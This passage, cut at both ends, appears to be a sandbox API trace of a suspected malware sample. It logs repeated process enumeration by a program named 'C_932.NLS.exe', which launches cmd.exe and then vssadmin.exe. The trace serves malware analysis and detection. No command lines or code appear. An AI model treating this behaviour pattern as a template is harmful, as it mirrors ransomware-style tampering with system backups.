pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0037.404] Process32NextW (in: hSnapshot=0x1f4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0037.404] Process32NextW (in: hSnapshot=0x1f4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0037.405] Process32NextW (in: hSnapshot=0x1f4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0037.405] Process32NextW (in: hSnapshot=0x1f4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0037.406] Process32NextW (in: hSnapshot=0x1f4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0037.406] Process32NextW (in: hSnapshot=0x1f4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0037.407] Process32NextW (in: hSnapshot=0x1f4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0037.407] Process32NextW (in: hSnapshot=0x1f4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0037.408] Process32NextW (in: hSnapshot=0x1f4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.408] Process32NextW (in: hSnapshot=0x1f4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.409] Process32NextW (in: hSnapshot=0x1f4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.409] Process32NextW (in: hSnapshot=0x1f4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.410] Process32NextW (in: hSnapshot=0x1f4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.410] Process32NextW (in: hSnapshot=0x1f4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.411] Process32NextW (in: hSnapshot=0x1f4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.411] Process32NextW (in: hSnapshot=0x1f4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0037.412] Process32NextW (in: hSnapshot=0x1f4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0037.412] Process32NextW (in: hSnapshot=0x1f4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0037.413] Process32NextW (in: hSnapshot=0x1f4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.413] Process32NextW (in: hSnapshot=0x1f4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0037.413] Process32NextW (in: hSnapshot=0x1f4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x97c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0037.414] Process32NextW (in: hSnapshot=0x1f4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0037.414] Process32NextW (in: hSnapshot=0x1f4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="C_932.NLS.exe")) returned 1 [0037.415] Process32NextW (in: hSnapshot=0x1f4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0037.415] Process32NextW (in: hSnapshot=0x1f4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0037.416] Process32NextW (in: hSnapshot=0x1f4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0037.416] CloseHandle (hObject=0x1f4) returned 1 [0037.416] Sleep (dwMilliseconds=0x3e8) [0038.784] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b8 [0038.788] Process32FirstW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0038.789] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0038.790] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0038.791] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0038.792] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0038.793] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0038.794] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0038.795] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0038.796] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0038.797] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0038.798] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.799] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.800] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.801] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.802] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.802] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.803] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.804] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0038.805] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0038.806] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0038.807] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.808] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0038.809] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x97c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0038.810] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0038.811] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x60, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="C_932.NLS.exe")) returned 1 [0038.812] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0038.813] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0038.814] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0038.815] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9f8, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0038.816] CloseHandle (hObject=0x1ac) returned 1 [0038.816] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9f8, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0038.817] CloseHandle (hObject=0x1b8) returned 1 [0038.817] Sleep (dwMilliseconds=0x3e8) [0040.703] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2f8 [0040.709] Process32FirstW (in: hSnapshot=0x2f8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0040.710] Process32NextW (in: hSnapshot=0x2f8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0040.712] Process32NextW (in: hSnapshot=0x2f8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0040.714] Process32NextW (in: hSnapshot=0x2f8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0040.716] Process32NextW (in: hSnapshot=0x2f8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0040.718] Process32NextW (in: hSnapshot=0x2f8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0040.720] Process32NextW (in: hSnapshot=0x2f8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0040.721] Process32NextW (in: hSnapshot=0x2f8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0040.724] Process32NextW (in: hSnapshot=0x2f8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0040.726] Process32NextW (in: hSnapshot=0x2f8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0040.728] Process32NextW (in: hSnapshot=0x2f8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.729] Process32NextW (in: hSnapshot=0x2f8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.731] Process32NextW (in: hSnapshot=0x2f8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.733] Process32NextW (in: hSnapshot=0x2f8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.735] Process32NextW (in: hSnapshot=0x2f8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.737] Process32NextW (in: hSnapshot=0x2f8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.392] Process32NextW (in: hSnapshot=0x2f8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.397] Process32NextW (in: hSnapshot=0x2f8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0041.399] Process32NextW (in: hSnapshot=0x2f8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0041.401] Process32NextW (in: hSnapshot=0x2f8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0041.403] Process32NextW (in: hSnapshot=0x2f8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.405] Process32NextW (in: hSnapshot=0x2f8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0041.408] Process32NextW (in: hSnapshot=0x2f8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0041.410] Process32NextW (in: hSnapshot=0x2f8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x101, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="C_932.NLS.exe")) returned 1 [0041.412] Process32NextW (in: hSnapshot=0x2f8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0041.415] Process32NextW (in: hSnapshot=0x2f8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 